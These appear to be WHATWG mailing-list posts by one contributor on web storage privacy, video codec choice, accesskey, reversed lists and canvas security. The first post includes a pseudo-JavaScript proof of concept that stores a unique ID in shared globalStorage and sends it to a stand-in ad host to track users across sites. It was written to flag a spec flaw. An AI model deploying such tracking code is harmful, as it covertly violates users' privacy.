[whatwg] Potential Security Problem in Global Storage Specification

2007-05-30 Thread Jerason Banes

Hello All!

This is my first post here, so apologies in advance if I'm not quite up on
the list etiquette.

I was just comparing the Storage API with that of Google Gears
(http://gears.google.com), and something jumped out at me. According to the
spec, browsers should allow a webapp to store data in the globalStorage
object with no domain attached (i.e. globalStorage['']). This is intended to
allow data to be shared across all webpages.

My concern is that this poses a problem for the user's privacy. Let's say
that I'm an Evil Advertisement site. It is in my interest to penetrate the
user's veil of privacy and determine which pages they visit. I've
traditionally used cookies for this, but the browser makers foiled my
attempts by allowing cookies to only be accepted from the originating site.
But thanks to the new globalStorage API, I can store a Unique ID in the
user's browser, then use Javascript to retrieve it every time they download
one of my ads.

Here's some rough pseudo-JS to demonstrate how it might work:

<script>
if (!globalStorage[''].evilbit) globalStorage[''].evilbit = createUUID();

function createUUID()
{
   // return a unique identifier using a random algorithm
}

function displayEvilAd(type)
{
   document.write('<img src="http://www.eviladagency.com' +
   '/getAdvertisement.asp' +
   '?type=' + type +
   '&tracking=' + globalStorage[''].evilbit + '">');
}
</script>

...

<script>displayEvilAd('banner');</script>
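
For concreteness, the createUUID stub could be filled in along these lines (a
sketch only; a version-4-style identifier built from Math.random(), not a
cryptographically strong one):

```javascript
// Sketch of the createUUID stub above: fill a UUID-shaped template with
// random hex digits. Math.random() is not a secure source of randomness.
function createUUID() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (c) {
    var r = Math.random() * 16 | 0;          // random nibble 0-15
    var v = c === 'x' ? r : (r & 0x3 | 0x8); // 'y' nibble is 8, 9, a, or b
    return v.toString(16);
  });
}
```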

Is there something I'm missing that would prevent this?

Thanks,
Jerason Banes


Re: [whatwg] Potential Security Problem in Global Storage Specification

2007-06-01 Thread Jerason Banes

On 6/1/07, Gervase Markham [EMAIL PROTECTED] wrote:


Ian Hickson wrote:
 Yeah, this is mentioned in the security section:

http://www.whatwg.org/specs/web-apps/current-work/#security5

 ...along with recommended solutions to mitigate it.

All of those mitigation measures seem to be non-ideal.



I disagree. The third item in the list describes the solution which I had in
mind:

Blocking access to the top-level domain (public:
http://www.whatwg.org/specs/web-apps/current-work/#public0) storage areas:
user agents may prevent domains from storing data in and reading data from
the top-level domain entries in the globalStorage object
(http://www.whatwg.org/specs/web-apps/current-work/#globalstorage). For
example, content at the domain www.example.com would be allowed to access
example.com data but not com data.

That effectively restricts the storage to a single domain and is in line
with how cookies work today.

Have any browser makers expressed opinions on which of them they are
planning to implement?



That's a good question, but I'm not sure it's one that the WHATWG can
answer. I do know that Firefox 2 already implements the Storage spec. Info
on that here:

http://developer.mozilla.org/en/docs/DOM:Storage

I wasn't able to find any docs that describe the Storage security model used
in Gecko, so I ran a few tests. What I found was that any attempt to access
globalStorage[''] or globalStorage['com'] from the context of a website
resulted in a security error. You can try the test for yourself here:

http://java.dnsalias.com/temp/storage.html

After loading the page, open the Javascript Error console. You should see a
security exception listed.
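
The probe in the test page boils down to something like this (a sketch; in
Firefox 2 `storage` would be window.globalStorage, and per the tests above
both the '' and 'com' entries come back inaccessible):

```javascript
// Touch a globalStorage entry and report whether the UA raised a
// security error. Any property access on a blocked entry may throw.
function canAccessStorage(storage, key) {
  try {
    void storage[key].length; // force an access on the entry
    return true;
  } catch (e) {
    return false;             // UA refused: security exception
  }
}
```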

I presume that the restrictions are relaxed for signed pages as well as
those that are run at a higher privilege level. (e.g. XULRunner apps.)

Is there a document somewhere outlining the actual benefits of this
feature, even as potentially restricted?



The specification has this explanation: "Web applications may wish to store
megabytes of user data, such as entire user-authored documents or a user's
mailbox, on the client side for performance reasons."

And it's not just performance reasons. If I wanted to work on a Google
Spreadsheet on a plane, for example, offline caching of the data would allow
me to continue my work without an internet connection. Then when I reconnect
to the internet and load the document, the client would sync its stored
changes with the server.

My understanding is that this is Google's justification for their new
Gears product, which is basically the same as the WHATWG Storage +
Database specifications, but with auto-sync and an incompatible API.

Thanks,
Jerason


Re: [whatwg] On separation of code and data

2007-06-07 Thread Jerason Banes

You may know this already, but the on* handlers have been deprecated and
replaced with the DOM 2 Events* standard. So instead of doing 'onclick =
DoFunction()' the programmer should be calling
element.addEventListener('click',
DoFunction, false). If I understand you correctly, this effectively
achieves your no code in data request. At least as far as the standards
go.

For what it's worth, I'm not certain that keeping code and data separate
fixes the security issues with XSS. For example, Fortify Software released a
JavaScript exploit that inlines JSON requests as a simple
<script src="/path/to/AJAX.json"></script> tag, then captures the data present in
the object created.

You can read about the full exploit here:

http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf

Such problems go above and beyond the issues present in mixing code with
data, and therefore require more sophisticated security models.

Thanks,
Jerason

* Microsoft has yet to fully support the DOM 2 standard. As a result, IE
does not support addEventListener. It does support
element.attachEvent('onclick',
DoFunction) which effectively achieves the same goal.
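
Putting the two registration styles together, a cross-browser wrapper might
look like this (a sketch; the addListener name is mine, not anything from
the standards):

```javascript
// Register an event handler using DOM 2 Events where available,
// falling back to IE's proprietary attachEvent.
function addListener(element, type, handler) {
  if (element.addEventListener) {
    element.addEventListener(type, handler, false); // DOM 2 Events standard
  } else if (element.attachEvent) {
    element.attachEvent('on' + type, handler);      // IE fallback
  }
}
```

Usage would be addListener(document.getElementById('123'), 'click', DoFunction);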

On 6/7/07, Pieter Ceelen [EMAIL PROTECTED] wrote:



Thus instead of creating

index.html
  <a href="#" onclick="DoFunction()" id="123">

we write

index.html
  <a href="#" id="123">

index.js
  document.getElementById('123').onclick = DoFunction;



Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

I believe an aim of whatwg is a viable implementable standard that
reflects the realities of the web while encouraging innovation. MPEG4
is part of the web (a growing part too).




If I may, I'd like to echo Timeless's point here. I've been watching this
thread with great interest and believe I understand both sides of the issue.
Theora is appealing because it provides a "Free as in no-cost to implement"
and "Free as in no-encumbrances" solution. However, it also provides a
solution that nobody uses today. Perhaps even worse, there doesn't seem to
be a lot of interest in adopting Theora in the future.

And can you blame web users? Theora provides a solution that's high
bandwidth and low quality. A very unappealing prospect for the
bandwidth-constrained environment of the web. Thus more competitive
solutions like MPEG4, WMV, RealPlayer, and Quicktime have been dominating
the web. The most popular form of video streaming at the moment is actually
the H.263 codec through Flash; a non-free codec running on a platform that
can only roughly be considered a standard.

If and when the Dirac codec (http://en.wikipedia.org/wiki/Dirac_%28codec%29)
is completed, there will be a viable alternative to the non-free video
codec problem that might justify the risk/reward equation for support. Until
then, however, we're going to need to look at supporting the existing
infrastructure. That infrastructure is based on the following options:

  - VP6
  - Windows Media Video
  - MPEG4
  - RealVideo 30/40
  - H.263
  - Quicktime Sorenson

Out of those solutions, VP6, WMV, Sorenson, and RealVideo can immediately be
discarded for their lack of standardization. That leaves H.263 and MPEG4 as
the only viable options.

H.263 is not a bad choice, IMHO. It's well supported by nearly every major
video player, has a variety of library implementations available, is in
widespread usage, and has a good tradeoff between bandwidth and quality. It
is also a standard under the ITU-T.

But what about MPEG4? Specifying MPEG4 has a lot of appeal for both its
excellent encoding performance and its single point to obtain licensing and
indemnity from. Furthermore, MPEG4 has its own container format and
low-bandwidth audio encoding scheme. (AAC is a sight better than having to
dictate ADPCM sound.) MPEG4 is also widely supported by media players,
though not quite as well as H.263. The MPEG Group also offers low-cost (i.e.
free) licensing to anyone shipping less than 50,000 units a year, which
means that it would be feasible for upstart browsers to support the
standard.

That being said, I think I prefer the H.263 standard as a video baseline for
a few reasons:

  1. It presents several licensing options. The implementer can choose to
  get indemnity via an available license like MPEG4-Simple (which will play
  H.263), choose to try and deal with individual patent holders, or
  simply attempt to ignore the issue. (The last case is particularly appealing
  in countries that don't recognize the patents related to streaming video
  technologies.)
  2. It's amazingly well supported both in hardware and software. Future
  mobile devices should have no trouble adding support for H.263.
  3. It's already the most popular codec on the web today. While Real
  has retired their H.263-based codecs, it still lives on in Adobe FLV
  files.
  4. Java decoders are available for creating shunts for browsers that
  don't currently support the video tag.

That leaves me with two (point 5) questions:

  1. Would this place too much of a burden on browsers like Mozilla and
  Opera? Could plugins to local OS codecs or media players slide around the
  licensing issues?
  2. Is there a good choice for container format that wouldn't
  additionally burden the implementors?

Thanks,
Jerason


Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

Hi Charles,

While I agree with your sentiment, I don't see a better option. The purpose
of the HTML5 spec is to provide a unified web applications platform that
supports the existing web in a practical manner. If the spec sticks with
Theora as the baseline implementation, it runs the risk of no one
implementing that part of the specification. If no one implements the Theora
codec, then the attempts to standardize the video tag will be all for
naught.

At the end of the day, I think the decision will come down to one of two
options:

  - The spec can specify Theora as the baseline, very few browsers will
  implement it, few users will use it (due to a lack of support), and thus the
  intent of standardizing on a free format will be lost.
  - The spec can be practical about implementing the video tag and
  specify H.263 or MPEG4 as a baseline. Existing multimedia toolkits can
  be reused in implementation and thus all browsers can support the standard.
  Users will use the format thanks to ubiquitous support. The tax will be a
  non-issue in most cases despite leaving a bad taste in the standard
  committee's mouth. Up and coming browsers can choose not to implement that
  part of the standard if they so choose or piggyback on an existing media
  player's licensing.

I personally think that having a non-free standard implemented in all
browsers is preferable to having a free standard implemented in none.
Otherwise, what is this tag being standardized for? We already have a mishmash
of options available through the embed and object tags.

It also occurs to me that the market is likely to define a format like MPEG4
as the standard whether the WHATWG wants it to or not. If the
least-common-denominator across browsers is MPEG4 (for example), then why
would the market embrace spotty support for Theora? The practical solution
will win out regardless of what is decided here. Which will force new
browsers to support a pseudo-standard rather than a real standard, anyway.
Exactly the type of thing that the WHATWG was formed to prevent.

Thanks,
Jerason

On 6/26/07, Charles Iliya Krempeaux [EMAIL PROTECTED] wrote:


Hello Jerason,

From a technical point-of-view, you make a very good argument.

However, I think it is inappropriate for the HTML spec to (directly or
indirectly) mandate people pay to implement it.

As you point out, H.263 is encumbered by patents and has licensing
costs associated with it. Costs that me, you, tool creators, and users
will have to pay, either directly or indirectly.

This just makes things more expensive for everyone since we are
essentially being taxed. And it's ridiculous to just accept this tax
when there's no reason we have to.


See ya

--
Charles Iliya Krempeaux, B.Sc. http://ChangeLog.ca/


  All the Vlogging News on One Page
 http://vlograzor.com/



Re: [whatwg] The issue of interoperability of the video element

2007-06-26 Thread Jerason Banes

On 6/26/07, Maik Merten [EMAIL PROTECTED] wrote:


Opera and Mozilla already have implemented (early) Ogg Vorbis and Ogg
Theora support.



And (if this thread is any indication) are likely to be the only ones.
Internet Explorer still holds the majority of the market, and Safari is
still the predominant browser in the Mac market.

Plus what is lack of support? Encoding apps for Ogg Theora are
available on basically every platform, as are players (yes, even
Windows Media Player and QuickTime player can play it with the fitting
components installed; same goes for RealPlayer). It's absolutely trivial
to encode content for it.



The same can be said for H.263 and MPEG4. Linux machines can play these
codecs with no issues as long as the codecs are installed separately from the
distro itself. The question that I hate to ask (because it goes against my
own grain to ask it) is, which is more useful to the web market: Asking
Windows users to install Ogg/Theora codecs or asking Linux users to install
H.263 codecs? Given that Linux has an extremely small desktop share
consisting of expert users, I'm forced to answer that they would be far less
impacted by a baseline support of H.263 than Windows users will be impacted
by a baseline support of Theora.

Free Software like Mozilla cannot implement MPEG4 or H.263 and still
stay free. The tax *is* an issue because you can't buy a community
license that is valid for all uses.



Indeed. That's why I asked how feasible it is for these browsers to plug
into underlying media players? On windows that would be WMP, Quicktime on
Macs, and libavcodec on Linux/Unix.

Plus even if you implement H.263 or MPEG4 video - what audio codec
should be used with that? Creating valid MPEG streams would mean using an
MPEG audio codec - that'd be e.g. MP3 or AAC. Additional licensing costs
and additional un-freeness.



Correct me if I'm wrong, but that depends on the container format, doesn't
it? If we use the MPEG container format, then yeah. MP3 is pretty much a
guaranteed necessity. However, I am not aware of any encumbrances (*grits
teeth again*) with the AVI container format. Which would allow for a
less-performant baseline like an ADPCM format, which is at least an open
standard.

Of course, I'm probably going to have to bow to my own argument and agree
that the market would never accept such a low audio baseline. Which means
that something like MP3 or AAC would indeed be a requirement.

Don't get me wrong: MPEG technology is nice and well-performing - but
the licensing makes implementations in free software impossible (or at
least prevents distribution in e.g. Europe or North America).



It is a difficult conundrum. If the WHATWG specifies theora, then it runs
the risk of being ignored. If it specifies an existing format then it runs
the risk of locking out some small cross-section of users. My argument is
based around the "devil you know" approach that the WHATWG has otherwise
adopted in its standards. It rubs me the wrong way to suggest it, but I
don't see any other way of ensuring that HTML5 video would become as
ubiquitous as FLV video has become.

Thanks,
Jerason


Re: [whatwg] So-called pre-existing use by large companies

2007-12-12 Thread Jerason Banes
Here's a rundown of the major media players and their support:

Windows Media - Requires third-party plugin (http://www.illiminable.com/ogg/)
Quicktime 7 - Requires Xiph.org plugin (http://xiph.org/quicktime/)
Real Player - Requires Helix plugin (https://helixcommunity.org/frs/?group_id=7)

In effect, no major media player supports Theora out of the box. It's
interesting to note that MPEG, H.263, and MPEG4/H.264 are far more
standard across media players. Which, I think, means that the spec should
recommend support for these formats.

However, a variety of good points were raised in a thread a few months back.
What you effectively have here is: if you choose a free format that anyone
can implement, you alienate the commercial implementations due to their
due-diligence fears.

(Which, as an aside, are justified when it comes to media technology. This
stuff is so mired in patents, it isn't even funny. H.263 was intended to be
an open spec that anyone could implement at no cost. It didn't take long
for patents to start coming out of the woodwork and effectively close the
format off.)

On the other hand, if you choose commercially supported formats like
MPEG/MPEG4, you run into the issue that the free software camp is afraid
of being unable to produce a GPL-compliant version. FFmpeg exists, but
distros are not legally able to ship it. The user has to download and
install it after the fact, in a pseudo-legal workaround.

Both sides argue that users can download a simple plugin which will make
either possible standard work. Which is true, but it ignores the fact that
Flash ships with the H.263 codec by default and is kicking everyone's sorry
asses in the online video space. As long as Flash has a consistent video
format that everyone can use and HTML 5 doesn't, Flash is going to be the
defacto standard.

I don't think there are any easy answers here. About the best solution I can
come up with is to provide browser detection of media formats. That way web
developers can do a runtime test for a media format and tell the user "Hey,
you need to install a plugin" if the format chosen by the website is not
available. Since the vast majority of computers have MPEG4 support, that
will likely become the resulting standard like JPGs and GIFs.
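
The runtime test could be sketched like this (a hypothetical helper of mine;
canPlay is assumed to behave like the spec's video.canPlayType(), which
returns an empty string for unsupported types, and the MIME types are
illustrative):

```javascript
// Walk a preference-ordered list of MIME types and return the first
// one the probe function reports as playable.
function pickPlayableFormat(canPlay, candidates) {
  for (var i = 0; i < candidates.length; i++) {
    if (canPlay(candidates[i])) return candidates[i]; // '' is falsy
  }
  return null; // nothing playable: prompt the user to install a plugin
}
```

In a browser one might call pickPlayableFormat(function (t) { return
video.canPlayType(t); }, ['video/mp4', 'video/ogg']).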

If enough people push long enough and hard enough for Theora, it will become
a new standard alongside these existing formats, much like PNG. Especially
if a few major web browsers ship Theora support long enough to assuage fears
over its unknown patent status.

Thanks,
Jerason Banes

On Dec 12, 2007 6:00 AM, Sanghyeon Seo [EMAIL PROTECTED] wrote:

 From what I read, it is argued, that pre-existing use by large
 companies is a good indication of less risk for submarine patents.

 It is also argued, that Theora has not much pre-existing use by large
 companies, and among others, H.264 does.

 Is this really true? I have a hard time believing that no large
 companies shipped Theora decoder ever. And how large is large? I
 would appreciate any information on this matter.

 --
 Seo Sanghyeon



Re: [whatwg] arrggghhh (or was it ogg)

2007-12-12 Thread Jerason Banes
If by "Corporate Blessed" you mean codecs like H.264, there's a very simple
answer to that. Nokia and Apple pay licensing fees to a company called MPEG
LA. MPEG LA indemnifies Nokia and Apple from patent lawsuits over the use of
MPEG-related codecs. Should anyone come forward with a new patent, the MPEG
LA will litigate the matter and/or come to an agreement with the patent
holder to license the patent on behalf of their member companies.

http://en.wikipedia.org/wiki/H.264#Patent_licensing

Thanks,
Jerason Banes

On Dec 12, 2007 7:15 AM, Joseph Daniel Zukiger 
[EMAIL PROTECTED] wrote:

 What guarantees do Apple, Nokia, et. al. offer that
 their corporate-blessed containers/formats/codecs are
 free from threat for (ergo) the rest of us? Are they
 willing to make binding agreements to go to bat for
 _us_ in court?


Re: [whatwg] several messages regarding Ogg in HTML5

2007-12-12 Thread Jerason Banes
(I've been watching the emails fly around with great interest, but there has
been a rather significant volume. You'll have to forgive me if the following
question has already been answered.)

It seems to me that the argument keeps coming back to the fact that H.264/AAC
has patent protection available while Theora/Vorbis does not. Thanks to the
efforts of the MPEG-LA, Nokia, Apple, and even Microsoft can sleep well at
night.

However, this raises a question in my mind. MPEG-LA is the administrator of
a variety of patent portfolios. Not just the MPEG sphere of patents, but
also IEEE 1394 and DVB-T. They are also working to add patent portfolios for
VC-1, ATSC, DVB-H, and Bluray. Which means that they are well-equipped to
provide patent administration and indemnification for a wide variety of
formats.

*Has anyone asked MPEG-LA if they'd be willing to provide indemnification
for Vorbis/Theora?* While I understand that there are no actual patents to
license at this time, a fee to MPEG-LA (enough to cover possible patents in
the future + MPEG-LA's standard profit margin) for protection against
submarine patents could very well solve this impasse.

Any thoughts?

Jerason Banes

On Dec 11, 2007 3:40 PM, Ian Hickson [EMAIL PROTECTED] wrote:

 In the absence of IP constraints, there are strong technical reasons to
 prefer H.264 over Ogg. For a company like Apple, where the MPEG-LA
 licensing fee cap for H.264 is easily reached, the technical reasons are
 very compelling.


Re: [whatwg] accesskey

2008-01-25 Thread Jerason Banes
Long story short, accesskeys were an idea that worked better on paper than
they did in practice. They inevitably interfered with normal browser
operation as well as other accessibility features in such a way as to *
reduce* the accessibility of many web pages.

The intended replacement is the XHTML Role Access Module
(http://www.w3.org/TR/2005/WD-xhtml2-20050527/mod-role.html#s_rolemodule).
It works in a manner similar to accesskeys, but attempts to resolve some of
the original shortcomings. I'm afraid I'm not intimately familiar with it,
but I believe it also resolves the original multi-mapping problem you
brought up.

A few links on the subject:

http://www.cs.tut.fi/~jkorpela/forms/accesskey.html

The original version of this document had a much more positive attitude to
 the accesskey attribute. Experience and analysis has shown, however, that
 the idea of author-defined shortcuts is generally not useful on the Web.
 Moreover, serious damage is often caused by the way in which the attribute
 has been implemented in browsers: it uses key combinations that override
 built-in functionality in browsers and other software.

 Unfortunately, browser support to the attribute is limited, and rather
 primitive. The accesskey attribute tends to mask out the functionality of
 a browser's predefined keyboard control, which is often much more important
 than page-specific access keys. Moreover, browsers do not indicate that
 access keys are available.



http://en.wikipedia.org/wiki/Access_keys

In the summer of 2002, a Canadian Web Accessibility consultancy did an
 informal survey to see if implementing accesskeys caused issues for users of
 adaptive technology (http://en.wikipedia.org/wiki/Adaptive_technology),
 especially screen reading technology used by blind and low vision users.
 These users require numerous keyboard shortcuts to access web pages, as
 pointing and clicking a mouse is not an option for them. Their research
 showed that most key stroke combinations did in fact present a conflict for
 one or more of these technologies, and their final recommendation was to
 avoid using accesskeys altogether.

 The World Wide Web Consortium (http://www.w3.org/), the organization
 responsible for establishing internet standards, has acknowledged this
 short-coming, and in their latest draft documents for a revised web
 authoring language (XHTML 2, http://www.w3.org/TR/2005/WD-xhtml2-20050527/),
 they have deprecated (retired) the ACCESSKEY attribute in favor of the
 XHTML Role Access Module
 (http://www.w3.org/TR/2005/WD-xhtml2-20050527/mod-role.html#s_rolemodule).


http://www.wats.ca/show.php?contentid=32

*So while it seems that Accesskeys is a great idea in principle,
 implementation brings with it the possibility that it either will not be
 available to all users, or that the keystroke combination encoded within the
 web page may conflict with a reserved keystroke combination in an adaptive
 technology or future user agent.*

 This potential problem was subsequently brought to the attention of the
 Canadian Common Look and Feel Access Working Group (who had previously
 suggested the use of Accesskeys M, 1 and 2), and after consideration the
 Access Working Group reversed its recommendation and now suggest *not* to
 use Accesskeys on Government of Canada Web sites.


Thanks,
Jerason

On Jan 25, 2008 10:43 PM, Jean-Nicolas Boulay Desjardins 
[EMAIL PROTECTED] wrote:

 Why are they removing accesskey?
 http://www.w3.org/TR/html5-diff/#absent-attributes

 I thought it was recommended to be used by WAI...

 What should we use? Because it's not said what accesskey is replaced
 with...



Re: [whatwg] Reverse ordered lists

2008-01-25 Thread Jerason Banes
To add to what Christoph is saying, perhaps there's a better way to look at
this problem? A reverse list has both a start and an end, just like any
other list. The key is that it's displayed in the opposite order of a
regular list.

This raises the question, why does the list need to be *serialized* in
reverse order? Given that it's a display attribute, wouldn't it make more
sense to force the UA into rendering the list in reverse? e.g.:

<ol style="order: reverse;">
  <li>one</li>
  <li>two</li>
  <li>three</li>
  <li>four</li>
  <li>five</li>
</ol>

Which would then render like this:

5. five
4. four
3. three
2. two
1. one

This also solves the partial render problem as the list would partial render
as follows.

Step 1:

1. one

Step 2:

2. two
1. one

Step 3:

3. three
2. two
1. one

Step 4:

4. four
3. three
2. two
1. one

Step 5:

5. five
4. four
3. three
2. two
1. one

Obviously this solution puts a bit more of the onus on the User Agent to
render the list correctly, but I think it's semantically more correct than
trying to encapsulate the display data in the DOM ordering. This also
provides backward compatibility as UAs that don't understand the reverse
attribute will still number the list correctly. (Whereas the previous
solutions would result in the numbering being reversed in older browsers.)

Thanks,
Jerason

On Jan 25, 2008 11:29 AM, Christoph Päper [EMAIL PROTECTED]
wrote:

 Simon Pieters:
  It was pointed out to me that the start='' attribute (and the
  corresponding DOM attribute) currently defaults to 1. This could,
  AFAICT, reasonably trivially be changed to make it depend on the
  direction of the list and the number of li children.

 Or you would introduce an |end| attribute, because 'start' is not the
 same as 'first'...

 I think it has been shown, that the meta attribute |reverse| would
 not work in HTML, it would have to be a command attribute, i.e. it
 doesn't describe the ordering of the following list items, but their
 intended display. This would make it presentational and thereby not
 suitable for HTML. It would belong into CSS, but that isn't very good
 at reordering boxes.



Re: [whatwg] [canvas] imageRenderingQuality property

2008-06-03 Thread Jerason Banes
If you don't mind someone weighing in who's been working with the Nintendo
Wii for the past year and a half, I have found that the quality setting in
Flash is tremendously useful. While the march of Moore's law has ensured
that Flash on the desktop is zippy, it has also created a gap whereby
smaller devices are powerful enough to compete with last generation
desktops. For these devices, the quality setting is more than a "nice to
have." It's absolutely critical to obtaining decent performance.

The algorithms I've used over on WiiCade automatically adjust for high
quality when on the desktop, and low to medium quality when on the Wii. This
provides a more consistent experience to users of both systems. In addition,
many games provide a quality setting in their options screen. (Similar to the
rendering-features options in most 3D games.) This allows the user to adjust
the rendering speed manually if the system is too slow or the game in
question is more than fast enough on the Wii.

I can see a quality setting in Javascript used in much the same way. The
site would set the quality of the rendering based on knowledge of particular
platforms. Modern desktops would default to highest quality. Furthermore,
video games (and we all know that's going to be a huge use of Canvas at some
point ;-)) that push the limit of Canvas may allow the user to shift down
as it were to compensate for their slower machine or the slow Canvas
rendering of their browser.
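
The site-side usage I have in mind would be something like this (a sketch;
the imageRenderingQuality property is the proposal under discussion, not a
shipped API, and the Wii user-agent check is my own assumption):

```javascript
// Pick a rendering-quality hint based on the platform. The Wii's Opera
// browser identifies itself with "Nintendo Wii" in its user-agent string.
function chooseQuality(userAgent) {
  return /Nintendo Wii/.test(userAgent) ? 'low' : 'high';
}

// In a browser one might then apply the hint to a canvas context:
// ctx.imageRenderingQuality = chooseQuality(navigator.userAgent);
```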

I definitely think this setting should be a hint rather than a hard and fast
set of rules. If a UA (especially desktop UAs) wants to ignore the setting,
that's fine. It will cause no appreciable damage. But it will allow for
slower UAs to be tuned for usage. e.g. If I'm looking at charts on my Wii,
I'd rather they be high quality. If I'm playing a video game, the quality
simply does not matter as much.

I hope you will all keep us poor device users in mind when you come to your
decision.

Thanks!
Jerason Banes

On Mon, Jun 2, 2008 at 5:52 PM, Oliver Hunt [EMAIL PROTECTED] wrote:


  Neither of these apply if the property were just a hint, but now you have
 to think about what happens to content that uses this property in 18 months
 time.  You've told the UA to use a low quality rendering when it may no
 longer be necessary, so now the UA has a choice it either always obeys the
 property meaning lower quality than is necessary so that new content
 performs well, or it ignores the property in which case new content performs
 badly.


 If the quality knob is no longer necessary, why would new content perform
 badly?

 The issue is not that certain operations are slower than others, the issue
 is that anything that requires the developer to choose between
 performance/quality is going to become obsolete as the performance trade
 offs are constantly moving and are not the same from UA to UA, from platform
 to platform.  I think the issue of performance is a complex one that will
 not benefit in the long term from a simple on off switch.  Conceivably we
 could introduce new rendering primitives, such as CanvasSprite, CanvasLayer,
 or some such which would, i suspect, provide a similar benefit, but be more
 resilient in the face of changing performance characteristics.



Re: [whatwg] Canvas origin-clean should not ignore Access Control for Cross-Site Requests

2009-03-13 Thread Jerason Banes
I think this is an excellent point. I've been playing with the Chroma-Key
replacement trick demonstrated in Firefox 3.1b3:
https://developer.mozilla.org/samples/video/chroma-key/index.xhtml
https://developer.mozilla.org/En/Manipulating_video_using_canvas
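
The keying step in that demo reduces to a pixel loop like the following (a
sketch, not the demo's exact code; the green thresholds are illustrative,
and in a browser `data` would come from ctx.getImageData(...).data after
drawing the current video frame into the canvas):

```javascript
// Zero the alpha of green-screen pixels in a flat RGBA array, making
// them transparent so whatever is behind the canvas shows through.
function keyOutGreen(data) {
  for (var i = 0; i < data.length; i += 4) {
    var r = data[i], g = data[i + 1], b = data[i + 2];
    if (g > 100 && r < 100 && b < 100) {
      data[i + 3] = 0; // dominant green: make this pixel transparent
    }
  }
  return data;
}
```

The processed array would then go back via ctx.putImageData().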

For my own experiments, I grabbed a green-screen video from Youtube and
converted it to OGG. If the access control were in place for Canvas, I could
have done direct compositing on an embedded video from TinyVid. Which would
open up some interesting possibilities for video mashups on the web.

Thanks,
Jerason

On Fri, Mar 13, 2009 at 11:24 AM, Hans Schmucker hansschmuc...@gmail.com wrote:

 This problem recently became apparent while trying to process a public
 video on tinyvid.tv:

 In article 4.8.11.3, "Security with canvas elements", the origin-clean
 flag is only set depending on an element's origin. However there are
 many scenarios where an image/video may actually be public and
 actively allowing processing on other domains (as indicated by
 Access-Control-Allow-Origin).

 Is this an oversight or is there a specific reason why Access Control
 for Cross-Site Requests should not work for Canvas?